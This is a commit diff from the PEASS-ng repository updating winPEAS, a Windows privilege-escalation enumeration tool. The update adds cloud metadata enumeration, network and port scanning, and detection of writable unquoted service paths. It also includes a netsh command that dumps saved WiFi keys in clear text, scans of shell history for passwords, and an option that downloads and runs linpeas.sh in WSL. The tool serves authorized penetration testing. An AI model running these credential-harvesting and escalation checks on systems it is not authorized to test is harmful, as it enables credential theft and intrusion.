github/PEASS-ng
1
Fork 0
mirror of https://github.com/carlospolop/PEASS-ng synced 2024-11-20 12:39:21 +01:00
Code Releases Activity

WinPEASS Big Update

Browse Source
This commit is contained in:
Carlos Polop 2024-08-27 22:08:48 +02:00
parent c37db4654c
commit b435119723
36 changed files with 1727 additions and 729 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
LICENSE
View File

@ -1,7 +1,7 @@
COPYING -- Describes the terms under which peass-ng is distributed. A copy
of the GNU General Public License (GPL) is appended to this file.
peass-ng is (C) 2006-2022 Carlos Polop Martin.
peass-ng is (C) 2019-2024 Carlos Polop Martin.
This program is free software; you may redistribute and/or modify it under
the terms of the GNU General Public License as published by the Free

3
README.md
View File

@ -38,6 +38,3 @@ If you want to **add something** and have **any cool idea** related to this proj
All the scripts/binaries of the PEAS suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own machines and/or with the owner's permission.
By Polop<sup>(TM)</sup>

2
linPEAS/README.md
View File

@ -233,5 +233,3 @@ If you find any issue, please report it using **[github issues](https://github.c
All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
By Polop<sup>(TM)</sup>

2
winPEAS/README.md
View File

@ -23,5 +23,3 @@ Are you a PEASS fan? Get now our merch at **[PEASS Shop](https://teespring.com/s
## Advisory
All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
By Polop

3
winPEAS/winPEASbat/README.md
View File

@ -132,6 +132,3 @@ This is the kind of outpuf that you have to look for when usnig the winPEAS.bat
## Advisory
All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
By Polop<sup>(TM)</sup>

6
winPEAS/winPEASbat/winPEAS.bat
View File

@ -4,7 +4,7 @@ COLOR 0F
CALL :SetOnce
REM :: WinPEAS - Windows local Privilege Escalation Awesome Script
REM :: Code by PEASS-ng; Re-Write by ThisLimn0
REM :: Code by carlospolop; Re-Write by ThisLimn0
REM Registry scan of other drives besides
REM /////true or false
@ -46,7 +46,7 @@ CALL :ColorLine " %E%32m(((((((((. ,%E%92m(############################(%E%32m
CALL :ColorLine " %E%32m(((((((((/, %E%92m,####################(%E%32m/..((((((((((.%E%97m"
CALL :ColorLine " %E%32m(((((((((/,. %E%92m,*//////*,.%E%32m ./(((((((((((.%E%97m"
CALL :ColorLine " %E%32m(((((((((((((((((((((((((((/%E%97m"
ECHO. by github.com/PEASS-ng
ECHO. by carlospolop
ECHO.
ECHO.
@ -363,7 +363,7 @@ CALL :T_Progress 1
:WifiCreds
CALL :ColorLine " %E%33m[+]%E%97m WIFI"
for /f "tokens=3,* delims=: " %%a in ('netsh wlan show profiles ^| find "Profile "') do (netsh wlan show profiles name=%%b key=clear | findstr "SSID Cipher Content" | find /v "Number" & ECHO.)
for /f "tokens=4 delims=: " %%a in ('netsh wlan show profiles ^| find "Profile "') do (netsh wlan show profiles name=%%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & ECHO.)
CALL :T_Progress 1
:BasicUserInfo

8
winPEAS/winPEASexe/README.md
View File

@ -178,6 +178,11 @@ Once you have installed and activated it you need to:
- [x] DNS Cache (limit 70)
- [x] Internet Settings
- **Cloud Metadata Enumeration**
- [x] AWS Metadata
- [x] GCP Metadata
- [x] Azure Metadata
- **Windows Credentials**
- [x] Windows Vault
- [x] Credential Manager
@ -256,6 +261,3 @@ If you find any issue, please report it using **[github issues](https://github.c
## Advisory
All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
By Polop

2
winPEAS/winPEASexe/Tests/SmokeTests.cs
View File

@ -12,7 +12,7 @@ namespace winPEAS.Tests
try
{
string[] args = new string[] {
"systeminfo", "userinfo", "servicesinfo", "browserinfo", "eventsinfo", "debug"
"systeminfo", "userinfo", "servicesinfo", "browserinfo", "eventsinfo", "cloud", "debug"
};
Program.Main(args);
}

4
winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Watson.cs vendored
View File

@ -20,7 +20,7 @@ namespace winPEAS._3rdParty.Watson
{
{ 10240, "1507" }, { 10586, "1511" }, { 14393, "1607" }, { 15063, "1703" }, { 16299, "1709" },
{ 17134, "1803" }, { 17763, "1809" }, { 18362, "1903" }, { 18363, "1909" }, { 19041, "2004" },
{ 19042, "20H2" }
{ 19042, "20H2" }, { 22000, "21H2" }, { 22621, "22H2" }
};
// Get OS Build number
@ -30,7 +30,6 @@ namespace winPEAS._3rdParty.Watson
if (!supportedVersions.ContainsKey(buildNumber))
{
Console.Error.WriteLine($" [!] Windows version not supported, build number: '{buildNumber}'");
return;
}
var version = supportedVersions[buildNumber];
@ -39,7 +38,6 @@ namespace winPEAS._3rdParty.Watson
else
{
Console.Error.WriteLine(" [!] Could not retrieve Windows BuildNumber");
return;
}
// List of KBs installed

10
winPEAS/winPEASexe/winPEAS/Checks/ApplicationsInfo.cs
View File

@ -117,6 +117,7 @@ namespace winPEAS.Checks
{ (app["Folder"].Length > 0) ? app["Folder"].Replace("\\", "\\\\").Replace("(", "\\(").Replace(")", "\\)").Replace("]", "\\]").Replace("[", "\\[").Replace("?", "\\?").Replace("+","\\+") : "ouigyevb2uivydi2u3id2ddf3", !string.IsNullOrEmpty(app["interestingFolderRights"]) ? Beaprint.ansi_color_bad : Beaprint.ansi_color_good },
{ (app["File"].Length > 0) ? app["File"].Replace("\\", "\\\\").Replace("(", "\\(").Replace(")", "\\)").Replace("]", "\\]").Replace("[", "\\[").Replace("?", "\\?").Replace("+","\\+") : "adu8v298hfubibuidiy2422r", !string.IsNullOrEmpty(app["interestingFileRights"]) ? Beaprint.ansi_color_bad : Beaprint.ansi_color_good },
{ (app["Reg"].Length > 0) ? app["Reg"].Replace("\\", "\\\\").Replace("(", "\\(").Replace(")", "\\)").Replace("]", "\\]").Replace("[", "\\[").Replace("?", "\\?").Replace("+","\\+") : "o8a7eduia37ibduaunbf7a4g7ukdhk4ua", (app["RegPermissions"].Length > 0) ? Beaprint.ansi_color_bad : Beaprint.ansi_color_good },
{ "Potentially sensitive file content:", Beaprint.ansi_color_bad },
};
string line = "";
@ -158,9 +159,9 @@ namespace winPEAS.Checks
line += "\n File: " + filepath_mod;
}
if (app["isUnquotedSpaced"].ToLower() == "true")
if (app["isUnquotedSpaced"].ToLower() != "false")
{
line += " (Unquoted and Space detected)";
line += $" (Unquoted and Space detected) - {app["isUnquotedSpaced"]}";
}
if (!string.IsNullOrEmpty(app["interestingFileRights"]))
@ -168,6 +169,11 @@ namespace winPEAS.Checks
line += "\n FilePerms: " + app["interestingFileRights"];
}
if (app.ContainsKey("sensitiveInfoList") && !string.IsNullOrEmpty(app["sensitiveInfoList"]))
{
line += "\n Potentially sensitive file content: " + app["sensitiveInfoList"];
}
Beaprint.AnsiPrint(line, colorsA);
Beaprint.PrintLineSeparator();
}

118
winPEAS/winPEASexe/winPEAS/Checks/Checks.cs
View File

@ -3,12 +3,14 @@ using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Management;
using System.Net;
using System.Security.Principal;
using winPEAS.Helpers;
using winPEAS.Helpers.AppLocker;
using winPEAS.Helpers.Registry;
using winPEAS.Helpers.Search;
using winPEAS.Helpers.YamlConfig;
using winPEAS.Info.NetworkInfo.NetworkScanner;
using winPEAS.Info.UserInfo;
namespace winPEAS.Checks
@ -21,8 +23,12 @@ namespace winPEAS.Checks
public static bool IsDebug = false;
public static bool IsLinpeas = false;
public static bool IsLolbas = false;
public static bool IsNetworkScan = false;
public static bool SearchProgramFiles = false;
private static IEnumerable<int> PortScannerPorts = null;
private static string NetworkScanOptions = string.Empty;
// Create Dynamic blacklists
public static readonly string CurrentUserName = Environment.UserName;
public static string CurrentUserDomainName = Environment.UserDomainName;
@ -47,7 +53,7 @@ namespace winPEAS.Checks
private static readonly HashSet<string> _systemCheckSelectedKeysHashSet = new HashSet<string>();
// github url for Linpeas.sh
public static string LinpeasUrl = "https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh";
public static string LinpeasUrl = "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh";
public const string DefaultLogFile = "out.txt";
@ -87,7 +93,8 @@ namespace winPEAS.Checks
new SystemCheck("windowscreds", new WindowsCreds()),
new SystemCheck("browserinfo", new BrowserInfo()),
new SystemCheck("filesinfo", new FilesInfo()),
new SystemCheck("fileanalysis", new FileAnalysis())
new SystemCheck("fileanalysis", new FileAnalysis()),
new SystemCheck("cloudinfo", new CloudInfo())
};
var systemCheckAllKeys = new HashSet<string>(_systemChecks.Select(i => i.Key));
@ -199,6 +206,52 @@ namespace winPEAS.Checks
}
}
if (arg.StartsWith("-network", StringComparison.CurrentCultureIgnoreCase))
{
/*
-network="auto" - find interfaces/hosts automatically
-network="10.10.10.10,10.10.10.20" - scan only selected ip address(es)
-network="10.10.10.10/24" - scan host based on ip address/netmask
*/
if (!IsNetworkTypeValid(arg))
{
Beaprint.ColorPrint($" [!] the \"-network\" argument is invalid. For help, run winpeass.exe --help", Beaprint.YELLOW);
return;
}
var parts = arg.Split('=');
string networkType = parts[1];
IsNetworkScan = true;
NetworkScanOptions = networkType;
}
if (arg.StartsWith("-ports", StringComparison.CurrentCultureIgnoreCase))
{
// e.g. -ports="80,443,8080"
var parts = arg.Split('=');
if (!IsNetworkScan || parts.Length != 2 || string.IsNullOrEmpty(parts[1]))
{
Beaprint.ColorPrint($" [!] the \"-network\" argument is not present or valid, add it if you want to define network scan ports. For help, run winpeass.exe --help", Beaprint.YELLOW);
return;
}
var portString = parts[1];
IEnumerable<int> ports = new List<int>();
try
{
PortScannerPorts = portString.Trim('"').Trim('\'').Split(',').ToList().ConvertAll<int>(int.Parse);
}
catch (Exception)
{
Beaprint.ColorPrint($" [!] the \"-ports\" argument is not present or valid, add it if you want to define network scan ports. For help, run winpeass.exe --help", Beaprint.YELLOW);
return;
}
}
string argToLower = arg.ToLower();
if (systemCheckAllKeys.Contains(argToLower))
{
@ -237,7 +290,7 @@ namespace winPEAS.Checks
CheckRunner.Run(() => CreateDynamicLists(isFileSearchEnabled), IsDebug);
RunChecks(isAllChecks, wait);
RunChecks(isAllChecks, wait, IsNetworkScan);
SearchHelper.CleanLists();
@ -258,7 +311,58 @@ namespace winPEAS.Checks
}
}
private static void RunChecks(bool isAllChecks, bool wait)
private static bool IsNetworkTypeValid(string arg)
{
var parts = arg.Split('=');
string networkType = string.Empty;
if (parts.Length == 2 && !string.IsNullOrEmpty(parts[1]))
{
networkType = parts[1];
// auto
if (string.Equals(networkType, "auto", StringComparison.InvariantCultureIgnoreCase))
{
return true;
}
// netmask e.g. 10.10.10.10/24
else if (networkType.Contains("/"))
{
var rangeParts = networkType.Split('/');
if (rangeParts.Length == 2 && int.TryParse(rangeParts[1], out int res) && res <= 32 && res >= 0)
{
return true;
}
}
// list of ip addresses
else if (networkType.Contains(","))
{
var ips = networkType.Split(',');
try
{
var validIpsCount = ips.ToList().ConvertAll<IPAddress>(IPAddress.Parse).Count();
}
catch (Exception)
{
return false;
}
return true;
}
// single ip
else if (IPAddress.TryParse(networkType, out _))
{
return true;
}
}
return false;
}
private static void RunChecks(bool isAllChecks, bool wait, bool isNetworkScan)
{
for (int i = 0; i < _systemChecks.Count; i++)
{
@ -274,6 +378,12 @@ namespace winPEAS.Checks
}
}
}
if (isNetworkScan)
{
NetworkScanner scanner = new NetworkScanner(NetworkScanOptions, PortScannerPorts);
scanner.Scan();
}
}
private static void CreateDynamicLists(bool isFileSearchEnabled)

93
winPEAS/winPEASexe/winPEAS/Checks/CloudInfo.cs Normal file
View File

@ -0,0 +1,93 @@
using System.Collections.Generic;
using winPEAS.Helpers;
using winPEAS.Info.CloudInfo;
namespace winPEAS.Checks
{
internal class CloudInfo : ISystemCheck
{
public void PrintInfo(bool isDebug)
{
Beaprint.GreatPrint("Cloud Information");
var cloudInfoList = new List<CloudInfoBase>
{
new AWSInfo(),
new AzureInfo(),
new GCPInfo()
};
foreach (var cloudInfo in cloudInfoList)
{
string isCloud = cloudInfo.IsCloud ? "Yes" : "No";
string line = string.Format($"{cloudInfo.Name + "?",-40}{isCloud,-5}");
Dictionary<string, string> colorsMS = new Dictionary<string, string>()
{
{ "Yes", Beaprint.ansi_color_bad },
};
Beaprint.AnsiPrint(line, colorsMS);
}
foreach (var cloudInfo in cloudInfoList)
{
if (cloudInfo.IsCloud)
{
Beaprint.MainPrint(cloudInfo.Name + " Enumeration");
if (cloudInfo.IsAvailable)
{
foreach (var kvp in cloudInfo.EndpointDataList())
{
// key = "section", e.g. User, Network, ...
string section = kvp.Key;
var endpointDataList = kvp.Value;
Beaprint.ColorPrint(section, Beaprint.ansi_color_good);
foreach (var endpointData in endpointDataList)
{
var colors = new Dictionary<string, string>
{
{ endpointData.EndpointName, Beaprint.GRAY }
};
string message;
if (!string.IsNullOrEmpty(endpointData.Data))
{
message = endpointData.Data;
// if it is a JSON data, add additional newline so it's displayed on a separate line
if (message.StartsWith("{"))
{
message = $"\n{message}\n";
}
if (endpointData.IsAttackVector)
{
colors.Add(message, Beaprint.ansi_color_bad);
}
else
{
colors.Add(message, Beaprint.ansi_color_gray);
}
}
else
{
message = "No data received from the metadata endpoint";
}
Beaprint.ColorPrint($"{endpointData.EndpointName,-30}{message}", Beaprint.ansi_color_gray);
}
Beaprint.GrayPrint("");
}
}
else
{
Beaprint.NoColorPrint("Could not connect to the metadata endpoint");
}
}
}
}
}
}

53
winPEAS/winPEASexe/winPEAS/Checks/FileAnalysis.cs
View File

@ -1,4 +1,4 @@
using System;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
@ -97,9 +97,19 @@ namespace winPEAS.Checks
else
{
foreach (var fold in file.FullPath.Split('\\').Skip(1))
{
isFileFound = Regex.IsMatch(fold, pattern, RegexOptions.IgnoreCase);
if (isFileFound) break;
{
try
{
isFileFound = Regex.IsMatch(fold, pattern, RegexOptions.IgnoreCase, TimeSpan.FromSeconds(20));
if (isFileFound) break;
}
catch (RegexMatchTimeoutException e)
{
if (Checks.IsDebug)
{
Beaprint.GrayPrint($"The file in folder regex {pattern} had a timeout in {fold} (ReDoS avoided but regex unchecked in a file)");
}
}
}
}
}
@ -111,7 +121,17 @@ namespace winPEAS.Checks
}
else
{
isFileFound = Regex.IsMatch(file.Filename, pattern, RegexOptions.IgnoreCase);
try
{
isFileFound = Regex.IsMatch(file.Filename, pattern, RegexOptions.IgnoreCase, TimeSpan.FromSeconds(20));
}
catch (RegexMatchTimeoutException e)
{
if (Checks.IsDebug)
{
Beaprint.GrayPrint($"The file regex {pattern} had a timeout in {file.Filename} (ReDoS avoided but regex unchecked in a file)");
}
}
}
}
@ -148,7 +168,7 @@ namespace winPEAS.Checks
return new bool[] { false, somethingFound };
}
private static List<string> SearchContent(string text, string regex_str, bool caseinsensitive)
public static List<string> SearchContent(string text, string regex_str, bool caseinsensitive)
{
List<string> foundMatches = new List<string>();
@ -157,17 +177,20 @@ namespace winPEAS.Checks
Regex rgx;
bool is_re_match = false;
try
{
{
// Escape backslashes in the regex string
string escapedRegex = regex_str.Trim().Replace(@"\", @"\\");
// Use "IsMatch" because it supports timeout, if exception is thrown exit the func to avoid ReDoS in "rgx.Matches"
if (caseinsensitive)
{
is_re_match = Regex.IsMatch(text, regex_str.Trim(), RegexOptions.IgnoreCase, TimeSpan.FromSeconds(120));
rgx = new Regex(regex_str.Trim(), RegexOptions.IgnoreCase);
is_re_match = Regex.IsMatch(text, escapedRegex, RegexOptions.IgnoreCase, TimeSpan.FromSeconds(120));
rgx = new Regex(escapedRegex, RegexOptions.IgnoreCase);
}
else
{
is_re_match = Regex.IsMatch(text, regex_str.Trim(), RegexOptions.None, TimeSpan.FromSeconds(120));
rgx = new Regex(regex_str.Trim());
is_re_match = Regex.IsMatch(text, escapedRegex, RegexOptions.None, TimeSpan.FromSeconds(120));
rgx = new Regex(escapedRegex);
}
}
catch (RegexMatchTimeoutException e)
@ -200,8 +223,6 @@ namespace winPEAS.Checks
Beaprint.GrayPrint($"Error looking for regex {regex_str} inside files: {e}");
}
//}
return foundMatches;
}
@ -444,7 +465,7 @@ namespace winPEAS.Checks
foundRegexes[regex_obj.name][regex.name] = fileResults;
}
}
catch (Exception ex)
catch (System.IO.IOException)
{
// Cannot read the file
}
@ -454,8 +475,8 @@ namespace winPEAS.Checks
timer.Stop();
TimeSpan timeTaken = timer.Elapsed;
if (timeTaken.TotalMilliseconds > 20000)
Beaprint.PrintDebugLine($"\nThe regex {regex.regex} took {timeTaken.TotalMilliseconds}s in {f.FullPath}");
if (timeTaken.TotalMilliseconds > 10000)
Beaprint.PrintDebugLine($"\nThe regex {regex.regex} took {timeTaken.TotalMilliseconds}ms in {f.FullPath}");
}
}
}

18
winPEAS/winPEASexe/winPEAS/Checks/FilesInfo.cs
View File

@ -290,15 +290,13 @@ namespace winPEAS.Checks
const string distribution = "Distribution";
const string rootDirectory = "Root directory";
const string runWith = "Run command";
const string wslUser = "WSL user";
const string root = "root";
var colors = new Dictionary<string, string>();
new List<string>
{
linpeas,
distribution,
rootDirectory,
runWith
}.ForEach(str => colors.Add(str, Beaprint.ansi_color_bad));
new List<string> { linpeas, distribution, rootDirectory, runWith, wslUser, root }
.ForEach(str => colors.Add(str, Beaprint.ansi_color_bad));
Beaprint.BadPrint(" Found installed WSL distribution(s) - listed below");
Beaprint.AnsiPrint($" Run {linpeas} in your WSL distribution(s) home folder(s).\n", colors);
@ -310,14 +308,16 @@ namespace winPEAS.Checks
string distributionSubKey = $"{basePath}\\{wslKey}";
string distributionRootDirectory = $"{RegistryHelper.GetRegValue(hive, distributionSubKey, "BasePath")}\\rootfs";
string distributionName = RegistryHelper.GetRegValue(hive, distributionSubKey, "DistributionName");
string user = WSLHelper.TryGetRootUser(distributionName, wslKey);
Beaprint.AnsiPrint($" {distribution}: \"{distributionName}\"\n" +
$" {wslUser}: \"{user}\"\n" +
$" {rootDirectory}: \"{distributionRootDirectory}\"\n" +
$" {runWith}: wsl.exe --distribution \"{distributionName}\"",
colors);
Beaprint.PrintLineSeparator();
}
catch (Exception) { }
catch (Exception ex) { }
}
// try to run linpeas.sh in the default distribution
@ -328,7 +328,7 @@ namespace winPEAS.Checks
{
try
{
WSL.RunLinpeas(Checks.LinpeasUrl);
WSLHelper.RunLinpeas(Checks.LinpeasUrl);
}
catch (Exception ex)
{

9
winPEAS/winPEASexe/winPEAS/Checks/ProcessInfo.cs
View File

@ -36,11 +36,14 @@ namespace winPEAS.Checks
{ "Possible DLL Hijacking.*", Beaprint.ansi_color_bad },
};
if (DefensiveProcesses.Definitions.ContainsKey(procInfo["Name"]))
// we need to find first occurrence of the procinfo name
string processNameSanitized = procInfo["Name"].Trim().ToLower();
if (DefensiveProcesses.AVVendorsByProcess.ContainsKey(processNameSanitized))
{
if (!string.IsNullOrEmpty(DefensiveProcesses.Definitions[procInfo["Name"]]))
if (DefensiveProcesses.AVVendorsByProcess[processNameSanitized].Count > 0)
{
procInfo["Product"] = DefensiveProcesses.Definitions[procInfo["Name"]];
procInfo["Product"] = string.Join(", ", DefensiveProcesses.AVVendorsByProcess[processNameSanitized]);
}
colorsP[procInfo["Product"]] = Beaprint.ansi_color_good;
}

3
winPEAS/winPEASexe/winPEAS/Checks/SystemInfo.cs
View File

@ -387,8 +387,7 @@ namespace winPEAS.Checks
static void PrintCachedCreds()
{
try
{
try{
Beaprint.MainPrint("Cached Creds");
Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-protections#cached-credentials", "If > 0, credentials will be cached in the registry and accessible by SYSTEM user");
string cachedlogonscount = RegistryHelper.GetRegValue("HKLM", @"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "CACHEDLOGONSCOUNT");

10
winPEAS/winPEASexe/winPEAS/Helpers/Beaprint.cs
View File

@ -81,6 +81,7 @@ namespace winPEAS.Helpers
/---------------------------------------------------------------------------------\
| {1}Do you like PEASS?{0} |
|---------------------------------------------------------------------------------|
| {3}Get the latest version{0} : {2}https://github.com/sponsors/carlospolop{0} |
| {3}Follow on Twitter{0} : {2}@hacktricks_live{0} |
| {3}Respect on HTB{0} : {2}SirBroccoli {0} |
|---------------------------------------------------------------------------------|
@ -132,6 +133,7 @@ namespace winPEAS.Helpers
Console.WriteLine(LCYAN + " filesinfo" + GRAY + " Search generic files that can contains credentials" + NOCOLOR);
Console.WriteLine(LCYAN + " fileanalysis" + GRAY + " Search specific files that can contains credentials and for regexes inside files" + NOCOLOR);
Console.WriteLine(LCYAN + " eventsinfo" + GRAY + " Display interesting events information" + NOCOLOR);
Console.WriteLine(LCYAN + " cloudinfo" + GRAY + " Enumerate cloud information" + NOCOLOR);
Console.WriteLine();
Console.WriteLine(LCYAN + " quiet" + GRAY + " Do not print banner" + NOCOLOR);
Console.WriteLine(LCYAN + " notcolor" + GRAY + " Don't use ansi colors (all white)" + NOCOLOR);
@ -146,6 +148,11 @@ namespace winPEAS.Helpers
Console.WriteLine(LCYAN + " -lolbas" + GRAY + $" Run additional LOLBAS check" + NOCOLOR);
Console.WriteLine(LCYAN + " -linpeas=[url]" + GRAY + $" Run additional linpeas.sh check for default WSL distribution, optionally provide custom linpeas.sh URL\n" +
$" (default: {Checks.Checks.LinpeasUrl})" + NOCOLOR);
Console.WriteLine(LCYAN + " -network" + GRAY + $" Run additional network scanning - find network interfaces, hosts and scan nmap top 1000 TCP ports for each host found\n" +
$" -network=\"auto\" - find interfaces/hosts automatically" + NOCOLOR + "\n" +
$" -network=\"10.10.10.10,10.10.10.20\" - scan only selected ip address(es)" + NOCOLOR + "\n" +
$" -network=\"10.10.10.10/24\" - scan host based on ip address/netmask" + NOCOLOR + "\n" +
$" -ports=\"80,443,8080\" - If a list of ports is provided, use this list instead of the nmap top 1000 TCP" + NOCOLOR);
}
@ -290,8 +297,7 @@ namespace winPEAS.Helpers
string value = entry.Value;
string key = entry.Key;
string line = "";
string line;
if (!no_gray)
{
line = ansi_color_gray + " " + key + ": " + NOCOLOR + value;

45
winPEAS/winPEASexe/winPEAS/Helpers/MyUtils.cs
View File

@ -122,6 +122,51 @@ namespace winPEAS.Helpers
return binaryPath;
}
public static bool CheckQuoteAndSpaceWithPermissions(string path, out List<string> injectablePaths)
{
List<string> result = new List<string>();
bool isInjectable = false;
if (!path.Contains('"') && !path.Contains("'"))
{
if (path.Contains(" "))
{
string currentPath = string.Empty;
foreach (var pathPart in Regex.Split(path, @"\s"))
{
currentPath += pathPart + " ";
if (File.Exists(currentPath) || Directory.Exists(currentPath))
{
var permissions = PermissionsHelper.GetPermissionsFolder(currentPath, Checks.Checks.CurrentUserSiDs, PermissionType.WRITEABLE_OR_EQUIVALENT);
if (permissions.Any())
{
result.Add(currentPath);
isInjectable = true;
}
}
else
{
var firstPathPart = currentPath;
DirectoryInfo di = new DirectoryInfo(firstPathPart);
var exploitablePath = di.Parent.FullName;
var folderPermissions = PermissionsHelper.GetPermissionsFolder(exploitablePath, Checks.Checks.CurrentUserSiDs, PermissionType.WRITEABLE_OR_EQUIVALENT);
if (folderPermissions.Any())
{
result.Add(exploitablePath);
isInjectable = true;
};
}
}
}
}
injectablePaths = result.Select(i => i).Distinct().ToList();
return isInjectable;
}
public static bool CheckQuoteAndSpace(string path)
{
if (!path.Contains('"') && !path.Contains("'"))

34
winPEAS/winPEASexe/winPEAS/Helpers/Registry/RegistryHelper.cs
View File

@ -24,6 +24,40 @@ namespace winPEAS.Helpers.Registry
return Microsoft.Win32.Registry.LocalMachine.OpenSubKey(path);
}
public static bool WriteRegValue(string hive, string path, string keyName, string value)
{
try
{
RegistryKey regKey;
if (hive == "HKCU")
{
regKey = Microsoft.Win32.Registry.CurrentUser.OpenSubKey(path);
}
else if (hive == "HKU")
{
regKey = Microsoft.Win32.Registry.Users.OpenSubKey(path);
}
else
{
regKey = Microsoft.Win32.Registry.LocalMachine.OpenSubKey(path);
}
if (regKey == null)
{
return false;
}
regKey.SetValue(keyName, value, RegistryValueKind.String);
}
catch (Exception ex)
{
return false;
}
return true;
}
public static string GetRegValue(string hive, string path, string value)
{
// returns a single registry value under the specified path in the specified hive (HKLM/HKCU)

43
winPEAS/winPEASexe/winPEAS/Info/ApplicationInfo/AutoRuns.cs
View File

@ -5,8 +5,10 @@ using System.IO;
using System.Linq;
using System.Management;
using System.Text.RegularExpressions;
using winPEAS.Checks;
using winPEAS.Helpers;
using winPEAS.Helpers.Registry;
using winPEAS.Helpers.YamlConfig;
namespace winPEAS.Info.ApplicationInfo
{
@ -256,6 +258,9 @@ namespace winPEAS.Info.ApplicationInfo
{
}
var injectablePaths = new List<string>();
var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(filepath, out injectablePaths);
results.Add(new Dictionary<string, string>()
{
{"Reg", autorunLocation[0] + "\\" + autorunLocation[1]},
@ -274,7 +279,7 @@ namespace winPEAS.Info.ApplicationInfo
"interestingFileRights",
orig_filepath.Length > 1 ? string.Join(", ", PermissionsHelper.GetPermissionsFile(orig_filepath, Checks.Checks.CurrentUserSiDs)) : ""
},
{"isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(filepath).ToString()}
{"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" }
});
}
}
@ -299,6 +304,9 @@ namespace winPEAS.Info.ApplicationInfo
orig_filepath = Environment.ExpandEnvironmentVariables(orig_filepath).Replace("'", "").Replace("\"", "");
string folder = Path.GetDirectoryName(orig_filepath);
var injectablePaths = new List<string>();
var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(orig_filepath, out injectablePaths);
results.Add(new Dictionary<string, string>()
{
{"Reg", autorunLocation[0] + "\\" + reg},
@ -317,7 +325,7 @@ namespace winPEAS.Info.ApplicationInfo
"interestingFileRights",
orig_filepath.Length > 1 ? string.Join(", ", PermissionsHelper.GetPermissionsFile(orig_filepath, Checks.Checks.CurrentUserSiDs)) : ""
},
{"isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(orig_filepath).ToString()}
{"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" }
});
}
}
@ -342,6 +350,12 @@ namespace winPEAS.Info.ApplicationInfo
string usersPath = Path.Combine(Environment.GetEnvironmentVariable(@"USERPROFILE"));
usersPath = Directory.GetParent(usersPath).FullName;
var config = YamlConfigHelper.GetWindowsSearchConfig();
var pwdInsideHistory = config.variables.FirstOrDefault(v => v.name.Equals("pwd_inside_history", StringComparison.InvariantCultureIgnoreCase)).value;
// add .* around each element to match the whole line
var items = pwdInsideHistory.Split('|').Select(v => $".*{v}.*");
pwdInsideHistory = string.Join("|", items);
try
{
if (Directory.Exists(usersPath))
@ -373,6 +387,14 @@ namespace winPEAS.Info.ApplicationInfo
foreach (string filepath in files)
{
var fileContent = File.ReadAllText(filepath);
var sensitiveInfoList = FileAnalysis.SearchContent(fileContent, pwdInsideHistory, false);
// remove all non-printable and control characters
sensitiveInfoList = sensitiveInfoList.Select(s => s = Regex.Replace(s, @"\p{C}+", string.Empty)).ToList();
var injectablePaths = new List<string>();
var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(filepath, out injectablePaths);
string folder = Path.GetDirectoryName(filepath);
results.Add(new Dictionary<string, string>() {
{ "Reg", "" },
@ -383,7 +405,8 @@ namespace winPEAS.Info.ApplicationInfo
{ "isWritableReg", ""},
{ "interestingFolderRights", string.Join(", ", PermissionsHelper.GetPermissionsFolder(folder, Checks.Checks.CurrentUserSiDs))},
{ "interestingFileRights", string.Join(", ", PermissionsHelper.GetPermissionsFile(filepath, Checks.Checks.CurrentUserSiDs))},
{ "isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(path).ToString() }
{"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" },
{ "sensitiveInfoList", string.Join(", ", sensitiveInfoList) },
});
}
}
@ -403,6 +426,9 @@ namespace winPEAS.Info.ApplicationInfo
{
try
{
var injectablePaths = new List<string>();
var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(folder, out injectablePaths);
results.Add(new Dictionary<string, string>() {
{ "Reg", "" },
{ "RegKey", "" },
@ -412,7 +438,7 @@ namespace winPEAS.Info.ApplicationInfo
{ "isWritableReg", ""},
{ "interestingFolderRights", string.Join(", ", PermissionsHelper.GetPermissionsFolder(folder, Checks.Checks.CurrentUserSiDs))},
{ "interestingFileRights", ""},
{ "isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(folder).ToString() }
{"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" }
});
}
catch (Exception)
@ -447,6 +473,9 @@ namespace winPEAS.Info.ApplicationInfo
try
{
string folder = Path.GetDirectoryName(filepathCleaned);
var injectablePaths = new List<string>();
var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(command, out injectablePaths);
results.Add(new Dictionary<string, string>()
{
{"Reg", ""},
@ -463,7 +492,7 @@ namespace winPEAS.Info.ApplicationInfo
"interestingFileRights",
string.Join(", ", PermissionsHelper.GetPermissionsFile(filepath, Checks.Checks.CurrentUserSiDs))
},
{"isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(command).ToString()}
{"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" }
});
}
